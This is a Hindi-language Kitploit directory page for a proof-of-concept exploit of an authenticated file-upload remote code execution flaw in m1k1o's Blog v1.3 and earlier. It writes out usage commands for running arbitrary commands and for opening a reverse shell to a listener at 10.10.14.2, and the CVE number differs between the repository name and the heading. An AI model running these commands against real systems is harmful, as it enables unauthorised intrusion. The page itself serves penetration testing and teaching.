Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
cve-2022-23636-poc | Kitploit
उपकरण/GitHubGitHub/cyhe50/cve-2022-23636-poc
पेलोड जनरेशनभेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणपेनिट्रेशन टेस्टिंगलर्निंग और शिक्षा
GitHubcyhe50/cve-2022-23636-poc

cve-2022-23636-poc

रिपॉजिटरी देखें
3 महीने पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

CVE-2022-23626 - m1k1o's Blog प्रमाणित RCE

m1k1o's Blog v1.3 और उससे नीचे के संस्करणों में फ़ाइल अपलोड भेद्यता के माध्यम से प्रमाणित रिमोट कोड निष्पादन।

विवरण

ajax.php?action=upload_image एंडपॉइंट अपलोड की गई फ़ाइल प्रकारों का उचित रूप से सत्यापन नहीं करता है, जिससे एक प्रमाणित उपयोगकर्ता छवि के रूप में छिपा हुआ PHP वेबशेल अपलोड कर सकता है। इसके बाद हमलावर अपलोड की गई फ़ाइल को सीधे अनुरोधित करके निष्पादन को ट्रिगर कर सकता है।

संदर्भ

  • EDB-50943
  • CVE-2022-23626
  • m1k1o/blog GitHub

प्रभावित संस्करण

  • m1k1o's Blog v1.3 और उससे नीचे

आवश्यकताएँ

  • Python 3
  • requests लाइब्रेरी
root@kitploit:~
pip install requests

उपयोग

कमांड निष्पादित करें

root@kitploit:~
python3 cve-2022-23626.py --url http://target:8081 -u admin -p admin -c "id"

रिवर्स शेल

पहले एक लिसनर प्रारंभ करें:

root@kitploit:~
nc -lnvp 4444

फिर चलाएँ:

root@kitploit:~
python3 cve-2022-23626.py --url http://target:8081 -u admin -p admin -lh 10.10.14.2 -lp 4444

अस्वीकरण

यह उपकरण केवल अधिकृत सुरक्षा परीक्षण और शैक्षिक उद्देश्यों के लिए है। इसका उपयोग केवल उन्हीं सिस्टम पर करें जिनके परीक्षण के लिए आपके पास स्पष्ट अनुमति हो।

टूल डाउनलोड करें